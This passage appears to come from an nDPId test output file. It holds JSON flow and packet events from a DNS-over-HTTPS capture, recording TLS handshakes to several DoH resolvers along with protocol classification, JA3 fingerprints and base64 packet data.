QUHMAEBBIIB8TCCAe0wgdahTDBKMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3MgRW5jcnlwdDEjMCEGA1UEAxMaTGV0J3MgRW5jcnlwdCBBdXRob3JpdHkgWDMYDzIwMjAwOTA0MDA0OTAwWjB1MHMwSzAJBgUrDgMCGgUABBR+5mrncpqz\/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7\/Oo7KECEgMMokdOfCPCyeubYMusjXM0tYAAGA8yMDIwMDkwNDAwMDAwMFqgERgPMjAyMDA5MTEwMDAwMDBaMA0GCSqGSIb3DQEBCwUAA4IBAQAoMB1ePZKC8NpTy2434kCI6h8NAXGSDejnRZYFr2QSx+TpoZipUWbMWCq8UzrMIxKC8UJACJQc6RIM+Xgz0ZRbGx25OD3V4vLxsczn\/nEIsXCHGvGoEBJqPqesQfpmU9r+oB2CbUgxGaJxDFqnidG6tH5KNxFVbrX2lPzXeDzKwLN1eUiZU\/lMuAOJwkK8zmwVXP5H7g6aco+MiZp06K8b\/Da3w0YGUY9fjEablMtV5ViuxARhZw1pWYWZo\/jGfvICDNvPKmx8V1X1Z4R8rNjm8UiPRR8P0NarasVvNtWs+6fXGpl\/hFMZzj6z4oAVh0vYNXKYxmaDs8l6pH8OOZ\/cFgMDASwMAAEoAwAdIBuLZjnTB3Kjce7+mNxfaBiRgPo4iNkyTjzm6+fh98MBCAQBAAD35z4OurpaleuYyQXrRwgunZx5itw99f\/qns7fqVRPpCakkPBqYtIkrAQds7t3x9gcyB3pN\/ek7QU4lXsRRnsrWpFsVpkkgouj8noQcYPmvp55cuzOEjLxYK5KOB1bU10ZmdANW3hMqgjTathZk6jfjNOD8MgF15uckgPUXOITOpG7UYd\/YtxRx7xgMGY0jlH\/+xeUF+NSAiy6s9oSi0oU\/QlatPOidPhVmRC84vWQNkgJhZubcKWseKLjiRRL9zUmMJ2fjig0R0EKUVh0pAUSNWsA0m3x1YIPV6kX\/fzGNkCBx4kijVkxENgEgAD9si+WguAjMtSH5qQYN0CMxwsWAwMABA4AAAA="}
01308{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":471,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946739400702,"flow_last_seen":946739400727,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":1272,"midstream":1,"thread_ts_msec":946739400727,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","server_names":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=jarjar.meganerd.nl","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"17:C9:8C:F5:DD:1F:0E:0F:DC:C5:42:4F:ED:C4:CD:57:5A:5D:7A:4F"}}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":486,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739401864,"flow_last_seen":946739401864,"flow_idle_time":7560000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":946739401864,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00855{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":946739401864,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"thread_ts_msec":946739401864,"pkt":"REREREREZmZmZmZmCABFAAFMN1VAAH4GvigKAAABX9jlmatwAbtGU6iimu8Jz1AYAfYHbQAAFgMBAR8BAAEbAwOH23fm3DrJaQXLovxzyYyk5R\/PesPVPPqPMsnNPw9NhCA+BKUjIeM9NnmcNXI7jO56RaAWoMnCcXIJRfPvBK89HQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACsAAAAGwAZAAAWZmkuZG9oLmRucy5zbm9weXRhLm9yZwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACAgB93oNekrupxQPrzRHifFos9GGTUaOGYLuLqXCSqLFg=="}
00915{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":486,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739401864,"flow_last_seen":946739401864,"flow_idle_time":7560000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":946739401864,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fi.doh.dns.snopyta.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04384{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":946739401922,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739401922,"pkt":"ZmZmZmZmRERERERECABFAAuALHhAADcGBdJf2OWZCgAAAQG7q3Ca7wnPRlOpxlAQAfURoQAAFgMDAHoCAAB2AwPibR+Wkzsx56DJDm5Eu1YLQR+8sKrid6w\/L4hLlzFi7CA+BKUjIeM9NnmcNXI7jO56RaAWoMnCcXIJRfPvBK89HRMCAAAuACsAAgMEADMAJAAdACBuK8qBa63Irnemz8DqNJ321mRXUwu2HpEN9mUutJb4PxQDAwABARcDAwAkUOaHYP5iZ2NNWAzfU4nuMAsSlIi3Xu6evUH+ePghzyW3lf1oFwMDDTdyOxvGAqdaXqn7mk56YQOkftztBpxUe9++1VUjQL0UTPE4dDghDlADUJrVIMNoajw7OVNVUJlwwZLv4SY0Vx3I7ELfEhgQAcbo8KTKAm9O2ms4MsOpGyCQp3Ck5bHL2bE4iiWi1kZ3XUOEqkWhVOIsnrRavV3YbdvOPn4o+EZD19BNo16d7FYA9cwlYFl0b+UOCHVkbAV5Ro0aksFmIDr9nN\/SKS5iC8KA1HQko\/XCtoZt\/uj26L8Jnm5j0xvi5PCt7eYN7FAf9foi+urRIknTbj0qt5H6t5n2fn2SPs3+74zq4arLW6Grk5JVfjN+EFn6r2Kqt2DBASpVLNRJlEJ\/bKKlz+O8J7CBDjbsuIjIaIhIezaNNWlBddC5u8MicCjaXDfeK0Y4HdjfUV3F5+ceyWCg99LhDO6xG0CeQL6QAIRHV0AxoEVRoc\/2vMJczsdaR6IckxN7UiFIufmha90IusH6BRII8ooR6OU8Y+2rZzYh5iUJTMhKuwIGbOPxF0ajku7y5uTYXkibFy\/3YRErBGtPfTP8lfcsC0F+hSBQLoIlrMlmFjzaT8UDL1Fvuj09G9ZfRK\/xhCkh\/7LpCMAmZL6FGK8dmeyLYWLMckLWasSF4SpcTPWxHh7bEgM8pdQOrhyOwV2+YyGE03XoHny98Ri5sKrhPxH0mGzGNnfYcuH6skZHVwAgYnBYfjM2lceI\/e8LUGXM+\/wIkpWQtiAxj5n9jqC6nREJd3P5hFhhc0S7dmq+lc8Ma343e0W1q85dFAt5euDl0kwrHQBD26Gn0UFzkp+rMUWqJmbE4SEGibShhwSALXJQIigpcGwGc5IATb5iv3WP28Ditv7SIopWvMI9EzLxDQqdqFyPqSJV1GQA4imlHzXCdMmJY\/F6D02T5M85XegGn9Uw4gKTdpJtNdQMeDpMCJmwPpp3X9pZUOt1oTofSb+42UBMYdGAmqh\/lucphpoooHZAFYzgka8EA3+5grzvvRKo1W30cuUHEkcEYum5QQBIn5p1pvfjSQasw1NoCcIklAiODFbTUw\/XBBzGVXrXLo+F9mr5HZJoE6PhrzpGbM+TbC9rdnXfxtb3I6K\/1AuBezoFfnGsw9Dx8ypoJ2UB3C5fLrpS2ieFOMX42\/Dh6ibKZmCZ2IU\/pKi9Kpxz6Ld6HAwuoH4Me9ywi7Ln36mC5YB9\/TIfNIYZgMETrU\/MCg2bIGnZ8vBftq4oKoZH5CfsoxNFs2PFEG\/5CVigap\/tCrH2NE2mXjfyEkFGiVnnGzcQq0blObS7iaq5g9ULTtsStUYEWVhOXk\/yHu5D3\/u6I0Omh\/4izYUAvc\/ASGJ3mfA9dMkNtOEG3hZYmo5CA9GnSRpy2RNoU8Pnf1XinGwNO1Gx8Pk+Rv6O6rF61GXd3j8LIla3tC+sE1vn8o1HuVrg0vtx6svaMmP8iNm4OXIuTyI0c3BbAjgOOu1kSB8ysQJy2HfJ8f+33ewV4FsqQND6r5bZILZFNT6hlGwEaOaKRgd8Dnd4N9fsicUPP3uwhfe3QdvqzyV7OOrXV1IVMp9zwSZ0pMfc8VWLEkiJAKnWpdefyOUExkz5+iOPBxgjTOCDXI2cxb6a85tRWFrVYfRjxQzYvDOiZkMdWovVcpGmC70Cf9f8rBw+ttYEmVtXQq6aUTGji6XfZ4PQSD6aFRmGvyCQ+CTuysuZPRTT+5cBQgpxWr3YBN+426lIaYsxvZASckGkJyHw7wpODlcoQhARdIU2IKEFRJvw6DT5X9zlpEEie0WCTVJ\/dO+1+JbTJMju5fx4Qacw2bdHAKBR6bgpX06u1h2Q89XiuB5q4CfjBycr3kVeONIM0plxcqhvNckbcicJV\/JrJUajfW3F3ZFA8QjvfJykVgp6OKAIPXZNUHoSa3jNomftQSYqyBfMezehknXHShl6ZuQM+Lvb\/uVlinF17iXo2SvKnezJm3fj5cHaM4wuZjkDVCLAE\/Nyn58e9ksRwhD\/gK97rjgBNP1ml+iaYZj1YbBsIP0G755OxhWhcssAbTkI8hBniALaUqQLLPs72nFgtfIXuPTAuoXoMJT42ulwoxGs43\/GTmjksUYpRygFZP5B0dC11WQeR8PhWFcDRYGLV7beAlYwch7ld5nUdJC5mrDnIj419\/n346cz6AR7+0Rr1O5IOtvdQctvdWRZfPDcKiKYfWWWQsFX4uwaKZ7iAJIc3Lf2Hi65\/5WG2H6DXV2pbdFmOOEMbCE9vzIalbNO5yuH17ffgvNYeseN8QYcMc1RjXhkpanOQhCXFt4LROEa0cWaGgGU8KVcV0lHoP38Yqy9\/r9NNO4BBtoRTZYqyQ2KiKQOeL\/DjGmqmnMdtRKO3G2+28PYYcreNlQFUQC1YZRjis96nJONLOoYWGmJ0Ajkc88jEcPUWJ+sQ1Ellx00rNPIeTKszE7eeP1Wj7159+psV+5ymtU7Wt8kdIG49kp2vIgkZ9Wr8jWgezRdBIRoNkNszLOkziHLmtjo71cfnALRZTzE3WjtfCQAqXYkE67df0jceQto9+YJvgwPL7SKReSla4kC23BVgPVvhUiIRAomTXxQfxzJl60MjaMhKYx8sdY8yirN79hBVxNOKvYgeXSM9ea5v58WsOsjoz8vxu1i6IS+wpQDUJRL5+7QRTbXkU\/IgZJ2JwIpYJc0TbCcC+KyzLGP46kWX4\/BnWI6G+lC3q+tZ9lzQmQowB2OgB76ZZzVRvbALuU+R4sPYYq0cv634FKIpwY3EtlYdlCLWfp7ZlgIV62ujlYvHhZTRnGetjI9EyQMIK7XK1fm0YXedSc3g1l5p3dkHYgG0bAtbWa59V3\/IoYFT00HruXjbYzC5+RMiqTRk0M0TGZSrhfPeJjn02Zk7jMnppUxVbahEe2he8Uscmty4roTPIhZyQUTcLmzDMG3cPUpihzyQpbl0WSI0dX58QFWhZM7xH+JJmJ8yAAlZtScWFT+AUyElBRyoWx1bFwnu5cjcTiBOKcIA77CG8sc2sMV00Vn5xS5qVm32olnJkfc6ppnqNQxjiR9wVkT49+iYCtbdmX6IKyWQeVFgUqJQ5BvdNdt7w7dJUeuhPf3VRpEO\/JuTbLlvGkK\/mwXyq24LF3XMtkm5t69hBaSeNohEZao6QmYxZ+NYvxyXtLt2f77PL2m3kxOteUzIZiuV3nkbaSTk55VWkCshKS7HYDGARWAphsf+0I+2o6\/uoYI0UX5N6tebXNoxQAq6JRpkCJZ\/PM5xuxlj\/WGjyfe87wS7vqJa3nEKMo793Ew3S5oj8lEIMcctbFE7wTV1TjUaweZw+Z3iwk0WNd4mhDiOEObjosKaAJZJCKcwHWWPj3Pv6sHr9LXFpkSQghXzPF88XInFPHMmaNePQ5+SQ27ys1WSoLOzvUvoiLb3ySSw3OKanqLRonKV7Zpi0Ytvm7fQizCZ+5Ne\/y\/c1MIzQYpj0KO81JwrZo2y2Ztgzyet8\/H8T5HbkOQKczJbxrmsEvEXSl\/OZ3PT4cobEGmH79r1jJnga64YFXN1twHKTB5tOqayNYoY8HWJExA6ECQm2d8vIM6vU7wGAu00l0do6yKY07icxt6ZdPJ5cHBwXXmOf03M\/8KffX9hGO6Tv76sw1+cR37dJRviYmME\/l8otZxWSrf"}
00957{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":487,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739401864,"flow_last_seen":946739401922,"flow_idle_time":7560000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3196,"flow_avg_l4_payload_len":1598,"midstream":1,"thread_ts_msec":946739401922,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"fi.doh.dns.snopyta.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
02088{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":946739401922,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1246,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1246,"pkt_l4_len":1212,"thread_ts_msec":946739401922,"pkt":"ZmZmZmZmRERERERECABFAATQLHpAADcGDIBf2OWZCgAAAQG7q3Ca7xUnRlOpxlAYAfU2WgAAHSeqZDGEXrFb+J1opG1dnPi4zgteeVslY9ZmFJlRTMTFOW+365tsM\/eWSLFN26wQY3yg0Y1FR+FA00qPga4\/wX0RoMfU+SI0dBiZB1tmIlqRr+vkKc2KX7jGL6yH9pbjNmGWfzy9B2zla2g4HVLW8pCqD27lbyw+DGZ\/hO2inmJfO0WMCDqHjCOm+F+BP64YRotqRni9BCcdPp\/FvRYRcX4k5KVXiCE2z69wUVsqPG1llKJj1CFH\/RsTm3g3KbtdQU0GjyNyQl2CDpurTyUPQ92fUKA\/X0cBMPJgzHC0dOP90IUWPM1DD3nsbrNmpz8lP9N79mRwF5LTOHbbfvAKtpN8hLwkt9ukwyBmXk8C+zmVLmgKdtBBeCiCgbaFL\/aA+J\/nNJ3jy0mYq5nUvVXTh2Z7\/bG7F7D15e+NHDTFMXBqoMonQB16IlIlFtAJa+1TB8nMDEieCqXSm2meI\/wkXXc32Srtv3AtM6vxPAOrV+x9rponJ6AacvE6\/cmUC4WCIDgujE5nGZYcMZSggbR9\/Kt6utpNlB5VFi1pEVrNaFZHw7aT6\/CtVG+zVSwvyQk0KhE6erbsuDtzZMxLvCtcsV6pPfC\/PRbO03YGJv8DK8LahvowpjPqbaymGAnYP9bBjmcj8Zybby5MtwMog5KW7YAI9rBYlENeM2Dy3vHARJIR5GB+j33qs5hvPkWTV3o9HKuDltN6e\/7cTcTid6DRvXmO1ZA7RcWnp1v9dX0nqCg+iwrqPJuk36pRQQSp3pYE1EAHLCzt3501t+KApLCxYzEbirRWptNyoeeEE5uOfBxYTM2WMleevobNDlfBM03M0aFglzGS3lCRV0yNWw\/ZBGahRO+XjHuBA+QxkBjzNIYvhBcDAwIZaqpl7KO\/aoS\/xaq63oePn\/l4wkgopi1lsaFYbJflvn5lJQcRSZHGqRIptAjGXWny5qRxC7sgGucrDoA5XZJpJ5rL1sQGrNBBnHYCcdhfkRgu0iYOklGG9xE+slZId49jcsAtWEU2I\/eEF\/gzGmcDoIKW9\/IU0pMNXTdWiWofVVPUZs\/Lb\/bN8htmbbfjLuBzEKhZpgveVlZPj5VXAuHEhXXk0ROaGAVglMZsxHsbdDUcKPQjQ9mHgMzqt\/SN4SKDhA1+9LRLSL4g\/ZmJxnsYsJZiPRXZLdaU9Cy+A4CQPYNfuO+XNekAtQHOOCFWcDjdfU7K6gPp+jdG+6zR71EFMeiGo9di5FuI+fsXGMjNiflcFg3\/oiEiQj+c+SXhXmg5cUUmZisM56tSTYoDbqV2I0clprpOcfYkTtT92I6EUzloL7npuW1zLxMXE7nwW5JzyWrlx3xaz6AAfotCwxm5ob\/ht48eMSnaGsDmVMmIKcAeXj9r\/Qgfm5ydj17A\/wWCVm\/7gADpBdFs4VTLiVB4jIonZRHnx0E40hyOWZIsEIEnMxJxrW8PkRcFDV5sXdcHtfh7iWchE466qSDTtK21gAz66LAGzIzDSi4jTfEAt1SbNYQ4BmQyjL19w9SMP8BzTvwsIFe6hnwpATT+7somRA\/Z26b4QEU5K1DZ7oOX\/WGJvzzyrIbd4MSiv77t6sgdhQ=="}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":503,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402059,"flow_last_seen":946739402059,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739402059,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":503,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":946739402059,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739402059,"pkt":"REREREREZmZmZmZmCABFAAFFMVtAAH4GEoIKAAABLuPINt7iAbvHEJB+u++XVVAYAfa5DQAAFgMBARgBAAEUAwMZSog080zqV7Jj5Dvb3ndcTDVXiuYN2\/F4nl5oM8685CAD8\/DpQOi68rj3Dpf6v96RxtLLH4tYGgdf5WLODM4bbQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPcmRucy5mYWVsaXgubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIJ7aJCDYGU5kBdEWwbRqPCTJbp2+gk2aiKbS3L7SQcx7"}
00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402059,"flow_last_seen":946739402059,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739402059,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04403{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":946739402097,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739402097,"pkt":"ZmZmZmZmRERERERECABFAAuAZpBAADcGGhIu48g2CgAAAQG73uK775dVxxCRm1AQAfXDSAAAFgMDAHoCAAB2AwMvYFLfcaEHo3aJMGXc3Nj5JHcSpejvVC+OlDWKY+lERSAD8\/DpQOi68rj3Dpf6v96RxtLLH4tYGgdf5WLODM4bbRMCAAAuACsAAgMEADMAJAAdACCh186lBtHTNByoJBA0po27dnFNUREe5HIPKtcxu6S2dhQDAwABARcDAwAg9o2cPZarHTdrUnIxRn1VCbJHnvCJutGQQOHJwtgi\/RAXAwMOr0yaSOXTVxNy1MdOCL2l0VNtPnwh1Pur1Peod0tJjP9bgm\/AXbCeom1NL8K2T1J0dOI2RGuShy8YsyfJSw5Wmm071ESTozks9\/pWNhc8EY3OZk6mCQg3Q3y0vd4NtUzxexbQ\/ljBYll7ps6UiVrepG46JDr3EaPIsRJxAZ8gk2GaeDNtt7RJ53LkT05zfjvHMA6aBmH7t2BOZWkMQkrXRLmYtnSacXrlIzcJzUpGVRU0MO5jJX8g6q6PFhL59lDZu8Wsxk4Ijhyg4K8UnAjzRt0sqrXp6a0SqTxPZDzAPdhdwet3y+1QvN+aCu84nNSfCfN63IrHLSK6g6E3lem15SKv2YkiXF084ouwYBCBJXJ0DejPRccdH+Bp7CthOdZD9VLsoaB6QmK0BYE+B3JLwPXFYwO17RILfiGHekeCLv1KycofjSKkrY8yMabLa35ij5iLlwpIadsWJnwxXtZhNE88TO3LP+8rk3SThdBjlwIn02grC3P5DVdRHQUuYvIj+XumPYY4OniV3MWQD5oVffgmBaE\/MiLcfXRUvAgscquxip1c\/\/iyBNFRLF3RUPwBL5NcLPUAOiX8VC6qW6UmkIisNPyl59sHHQPhjQtTaV3HdBxVSxa+lXvafEDpCFPhfq7Z8DomnjFz314Mo2YICe+ZZ\/VP\/fu7\/DCzGaGMJt\/y8fB\/6C7VSPpretnL2mHkpzqNNsRNJHmpTbExTf\/W0z7d7eRfUyi4HRoWhN1u+9quMVSyao8SZFSb9c6pJV2Cpd+PDnrbNELHRV\/F65mKZXLF2SBEFyPK6XtRb+DOfMx0N6eOXr93S\/6+HvwSpArnHXm2qs+EDh7L5OyLbYX7hk\/pTg3eyPRsiU+T1VKMmTm3HYiEMmPROOISeM2PorfGczBqiAbHiPnaSSCDWzXHHee3yjPZXq9NGQADWivkdXNHAGorqs10ePRotp6azTgDg+3xjhiyUN8\/5\/JSc3Kyd9\/Y7eBwt2u3jJ0Ir1dMpZrh8Xytn\/oFEDmMRBapOHclfLOBBRZGJk+RA7J4ax9KIam6HVgRqufRZ7dV+VdgeVMjYSy4DQHs6oQV1dnsfERFBqYVQdJ93jWD1Gsdc8Pxx1qQ6tb7lnC4UqWJg2j4TF\/4asugxqLUp8iztI1CeTH4Reu1S6K\/rL+\/r1FEIu\/3a\/Pc+80qIi1Y87Z88cA68V6AnrKI\/jRFdeUnKaulroYDyincGpznQ32nbV7\/a8ufW3HqHzuY8Srdsdzg7OWNNr818v6m39ySIusJPgs5uFC9xvx8R+dIpVEYzkh3Q2eeeMG9\/8K2vIPpbbOtWSl8S5FN+69DYbQxN3KXTRYnKAcgBhodqiyj+6scHhaFARQYGoblFVqgXvJu7mshFdDHwBCaC5uowdNEKy4yrw5ottXf3H2NCsu9qcfXXi\/z\/OosB\/qYdcOqltwSq\/80V+8Ge38CLLZRSG\/4XrYzdhVDiFWoHxmaBU5QDEtQZH3S5OWqN1YkEB+FuSwADN6wY1gWAHclaDt280QNrqehBd4CwSsxy7G0qCDy36MMZMs7kf2Vj2TgH2Ktlytg+thkxDKtjS\/3aeMtSmm43ddFCAwkHZueXWUvoZnXP444s3zmu+73i2ZuHERFPrHSjFT+Y1Mpgo0Q6tWu1ilCv3IprR0S6yOnEJ5GH5r1Gf8ZIpGpefh36oorDOpgHiyqyCCd2qxXI8dwpeWwmWx2f1fKIN+bOmeDA+2HTL5b\/h\/S8LxTnnbWVqrgwQxdpAQ1xCVDtsVFko7TfSsPQoikR1NXdGw35qIw15E77U92szex\/zyWrA\/2KGcD2M3u3eNzXjjgmkxW27iRaDVs9Dg00I8PXscfPuLziMbIIt+Qm0SfB\/SFf1ylBL4HammClVdC7YNhrs4NDTvUTrxAf\/9BLynvePRrZvNzUMjBT8JtlvsBmnasO+COXrGwGyL50S3HH+eTrpMH9LMnT\/2nWeiT7sDmyjA9eJmW05\/8DRI8uR2ignlELeQeE7ZYC8KKYreOyXVjuVJO8KRaBbSIU8dUGF\/ILBa6hey1v4zK5JU1MHXOVQdX1RkKit5IUXefBWJ4R0BtjoPPFwKYAfyrsAKBcQzvKsyota24c0cDVjMzge24BKry1Tqr123sw9sTncyGrJzrjJCAkeCEkQo\/KqOKmxNrr6CtJmmIByoS+EjVKjVpJBluAdt5s3qw9VBr\/A44f7M4XZ82OLHYLOdXuuY4Rgtek4oFOa\/eUNUqECm7Y6b272wQZRBWvplBYlD2RWyR8BI01QWkzD2WfZpeGCzTSL5ABcGznl3CTw+DF6WcoeJd6SbUQUUEPVBF4u3zdh9b1Jl9zNuwWauO57o6a9eFR5unb1g++tHtZoIerFI1gyMEkvujqSt\/jK8uIRkRYOGlslTd\/3gwipdTVXxsLWi2fDz9+hxgVNOGQx8\/XNWyG1F\/L1mjtzU1UBNgZmslQP0EHO4J0uMMhguKNrTksx3df79c\/0PdkBKYtPr+8Ipj\/SC3QYRzf0s53zKfkSiObQ\/sOVJpwMvMhEUZunN4GQG+WMzs5eDRzdpQVJe47jiYijmkgXFbUCq004yxOCosLJYnsGKuZDQyE0z4teBgJH8ZC2mVlhO8lAz8gPU5mm5pEBH0gFKqsINKjcIbhVPUHYBlhBeR1erIfe5hsNdbM\/YCyGrep30hH+qZ\/IBF\/s3j2eRJAN56DPG7eQXCsiZSBsk9PTgJ38fSGAbaH0pLxsq2c1CaH7DzSlA01ud99lTK4rI7nRSGX9tAnrwTrORIzDrntkMH1VggJmMFY3EGxAMzh1CUd24C\/NVxnQ9P5qmX0Sgg6uSgxO2c7COAq2edHC\/ucd7dmb9rLGiOGU7YGRxfXuPTU+xfVNmV8wvcxQY9WY3QcHJbT2Vz2Hldj+q9L+347LUl4d5nRCyZOpijGWSFFM5lFqup\/GoObWXXvMsTO9NawTXovnf4MnjeZczPg2FrW3tlX0uBW7P24cE4VNHjvnvHknCsLft2dOFPhwAUA7qVOuJixr0stgCN8eCmK\/n1WzppsTm55hMBmYIkE9rYwxrxXiN39LFT+j0SlpiMqf5n1b7aJjSjiQjm1\/T42XF5prhRwaxJyOBzS5a2w2BxZDhOvMuBRY6ZtDe+ptzu07\/eUIO\/cQq36LXuMCRYTHNEIXnWWtA0vjAcmq+EwSCLEygFwVxoPgN5h2qTp7SdJVushbBgsziLiKFyhenEAkjP4tYMg82sWXtGvK2T4GbMrKF+OJsVll7gTGHENl+vuBtGryghKs2kRZov918dT+VWdywju+ew9zl+S0NiyZlvWu+CmHSGFpvtCqWMXNaXEERtmXJVFofSJ7ykCfNo49lq+tJOi\/mrPExexfpWVgisqVMvGukP+ZkhcE5Ck47mFMZqfJTRL364HqGaNbc7EKIa